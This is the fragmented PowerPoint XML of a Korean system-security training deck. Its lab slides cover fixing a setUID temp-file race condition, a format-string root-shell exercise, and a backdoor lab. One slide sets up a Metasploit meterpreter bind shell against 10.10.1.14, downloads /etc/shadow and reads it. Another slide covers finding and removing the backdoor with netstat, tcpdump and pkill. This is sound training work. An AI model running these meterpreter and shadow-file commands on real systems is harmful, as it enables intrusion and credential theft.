              <a:t>권한상승 공격 및 방어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시스템은 임시 파일을 간편하게 생성하기 위해   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/sec/createTempFile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해당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파일은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Race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대해 취약점을 가지고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해소하시오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setUID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 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C368EF7A-92D1-4A91-81D9-5D26FFC4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6DCF83-117F-4AE4-9EA9-30C83997164A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C42FDF-5869-4AED-8491-8D923280D19D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20B5FD6-6171-46A1-B1F9-896664A6F0F8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C070845F-0B2E-4ECF-9421-4008703FC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763094-5A83-47D7-820A-3B67422636AB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830D1E0-CD72-468E-A4A1-E8E4D56EC2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0347296-C5B3-46CB-9C9D-EBEF8AA4E40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3A0A3B-518D-4E0C-96A5-E9AE75449CA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화살표: 오른쪽 25">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3EF9C77-CDC2-433F-A50D-1B1EE098C2B2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024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 이동 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/createTempFile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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/createTempFile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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) createTempFile.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 코드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/>
              <a:t>vi createTempFile.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/tempfile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>삭제 후 다시 파일을 추가하는 취약점으로 권한 상승에 이용될 수 있음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취약한 부분 수정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remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>제거 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>fopen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>옵션 변경</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(“a” → “w”)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91166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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) createTempFile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>재빌드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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>o createTempFile createTempFile.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>부여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u+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> createTempFile</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 155">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C86DE2-5CFF-4922-B74D-3E79D49F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100666"/>
            <a:ext cx="5135880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57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77AE325C-E7D5-42AF-837C-9CF57E2E0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2" t="895" r="753" b="540"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="479425" y="2190750"/>
            <a:ext cx="470535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59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C1EB702-DA42-4AD4-A5CE-03B8D959B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5" t="-19" r="821" b="460"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310313" y="466726"/>
            <a:ext cx="4891087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61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A719016-8296-4BCE-A732-C7DB894592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4" t="13375" r="936" b="78042"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310313" y="3671888"/>
            <a:ext cx="4891087" cy="2762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63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7AC04FE-A749-43E7-A9DD-F9FF82E99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5" t="13945" r="1303" b="65179"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310313" y="4491036"/>
            <a:ext cx="4826191" cy="6667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F8C23-D2DC-409F-BC4C-A9AA10E30E4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5378388"/>
            <a:ext cx="5616792" cy="11106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2AFB936-0A16-4472-839D-C4CB7491020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8F39187-2D63-4909-952A-85B228F6439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DC04A2-D093-454A-BE2C-5B5CC2AF620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F30E2DF4-7AFB-4C86-BD31-B9083CEBE15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3720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/Training/Unit/Sys/13</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 13. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>백도어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>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msfconsole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도구를 사용하여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구동하시오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Backdoor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53E594-46B0-4F56-9E17-B8E287BBB078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2BCA785-13BB-4EE4-ABCA-83F32969B08B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33AD7B-4837-4FA9-8659-7386F4BC2106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56DAAD83-1583-41A3-AEC7-F625E9D17D76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428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/Training/Unit/Sys/11</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 11. Format String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>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fmstring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포맷 스트링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루트 쉘을 획득하여라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pass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변수의 값이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루트 쉘을 획득할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역어셈블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 intel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취약점을 이용한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공격에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(CentOS5.5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95104B-D563-401A-BE7D-47FE8C8E68AF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809A7F8-261C-48CB-A7DF-F360A5AF3D1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5771A3-B701-4BD2-829F-C7E5CC1C124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966EEB9C-1C55-4DA4-A34F-D4E030F96676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09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ifconfig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령으로 공격 서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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ifconfig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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) Metasploit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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>use exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/multi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/handler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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>&gt; use exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/multi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/handler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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/x86</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>bind_tcp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err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> exploit(handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>&gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/x86</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>bind_tcp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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>show options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err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> exploit(handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) &gt; show options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8" name="Picture 167">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E295136F-BC83-41C3-8CA1-CCEBAC77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062566"/>
            <a:ext cx="4922647" cy="297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69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA368846-64C5-4769-92E1-E1A20DD2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1" y="4560146"/>
            <a:ext cx="1474084" cy="7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71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99680F7B-188C-480E-B4BA-66C2B9E0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539" y="4352903"/>
            <a:ext cx="3512349" cy="186832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73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBD3A009-4181-4981-8B27-BC0B311D9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" t="87424" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="944880"/>
            <a:ext cx="4992624" cy="3513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75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCE44FFD-315F-4697-AF6C-1E6DF9EB9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" t="88153" r="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6321334" y="1993011"/>
            <a:ext cx="4992624" cy="3513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177">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974ED12D-E9DE-45FC-AE82-FACB25C0D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382" y="3041142"/>
            <a:ext cx="4989576" cy="298437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3B9FDD-5049-4ED0-8488-FF305F42FF6D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F814EA6-6372-4935-B64B-63917BF26F0E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3D6315-16A4-423C-B9F6-F5C5F4452C9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81BFEB44-4EE0-4901-9C27-1B68FC72326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40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1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7) RHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 백도어가 실행 중인 서버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 입력 및 공격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err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> exploit(handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>&gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>RHOST 10.10.1.14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err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> exploit(handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>&gt; exploit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명령어 실행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meterpreter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>&gt; ls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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) 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다운로드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meterpreter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>download /etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow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1133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10) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>세션 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Metasploit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meterpreter &gt; exit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err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> exploit(handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>&gt; exit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11) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>다운로드받은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>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cat shadow</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 179">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58C3BCA3-9BB8-4337-B5CF-B403A753F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9926" r="168"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="485141" y="1173480"/>
            <a:ext cx="4894580" cy="147925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6" name="Picture 181">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{891A50A9-8CB4-4BBE-980C-FBD922DBB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7835" r="-34"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="485141" y="3261360"/>
            <a:ext cx="4981586" cy="12530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183">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1F17DDB-A907-4B63-9349-AC559CF79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372" r="-587"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514235" y="5224401"/>
            <a:ext cx="4981586" cy="46011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8" name="Picture 185">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6063D546-AB04-4D65-9C36-C2817EA9E7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5071" r="111"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6314441" y="1090633"/>
            <a:ext cx="4947920" cy="7354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87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34395978-B9BB-4247-AB05-15CF4EFB3C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256"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291835" y="2324100"/>
            <a:ext cx="4959223" cy="995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1361A-A816-4D54-9650-AAEAA2A01279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="3596640"/>
            <a:ext cx="5616792" cy="28923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acheck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력 및 다운로드 받은 파일 이름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aehcek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/root/shadow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E63070-84AD-4DF5-8C2B-A77D3520EC6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2BFCBC-D873-4CF2-B71E-37DB2EBF208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E0C087-F915-4BB4-BEC5-23B4FAB544A2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F323CA0F-9700-4100-84B1-7B2B9E8647F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6919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72AF5CF2-5352-4A46-B0EB-8A66B562E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/Training/Unit/Sys/13</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 13. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>백도어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 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Linux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해커가 침입하여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내부에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심어 놨다는 정보가 입수되었다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공격자 서버와 접속 중인 것으로 보이는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찾아 삭제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열린 포트 목록 확인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netstat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tnap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중인 프로세스 확인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-ef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중인 프로세스 중지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pkill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4)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rm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C72BED5-71CD-4D9B-90ED-1967D0EE91BE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71BDEB3-AF50-47EA-BD0D-EFBAD1A250F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B8AF3E-54E3-484F-B88B-76A5A200174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5EB805CD-A0E2-4B2D-8722-1E14160DB68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436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netstat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>| more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령으로 열린 포트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netstat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>| more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패킷 캡처 및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–c 200 –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>w packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>r packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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사용자 서버와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>192.168.1.169 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버 간에 많은 통신이 수행되고 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와 통신하는 포트 및 프로세스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netstat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>| more</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 189">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{728B4C54-43A6-446E-9DF2-58C0AE15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879686"/>
            <a:ext cx="4877816" cy="273519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6" name="Picture 191">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10B247FD-E1F6-4EF3-9F6D-FC3F3EC6D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3" r="2233"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="491072" y="4282440"/>
            <a:ext cx="4877816" cy="6096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193">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3EBBEC8-DFA0-4959-BBFF-C5F1A8B587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14" r="350"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="491072" y="5158135"/>
            <a:ext cx="4989196" cy="106485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8" name="Picture 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9969BFB-5647-4C23-96C6-0F1477534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140" r="480"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340729" y="486293"/>
            <a:ext cx="4982591" cy="174798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0" name="Picture 197">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B282583C-EB70-428E-A36A-5E719528FD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093"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340729" y="2995262"/>
            <a:ext cx="4877816" cy="17479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0A445C-03BC-4C6F-9C9B-0EB26966B6DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6340729" y="4803146"/>
          <a:ext cx="4932807" cy="146799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99628295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453205"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="994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찾는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명령도 활용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 /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-name </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc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linux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.elf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091311"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80897" name="_x1658364984">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1621EE3-D92B-43A5-A1BC-CB3D95DE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52" y="5648745"/>
            <a:ext cx="3733800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88123D-B7BC-438E-8414-0486723573F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D1A3903-D332-424C-978F-BE1E5D97FD0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382FE5-43E0-45C4-A508-B6BD6ADE31E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BBC19145-4568-4C52-BC8C-97F5B497EBD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50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의심 프로세스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err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> –ef | grep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/elf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해당 프로세스 강제 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.elf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의심 프로그램 파일 삭제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rm /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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.elf</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 199">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
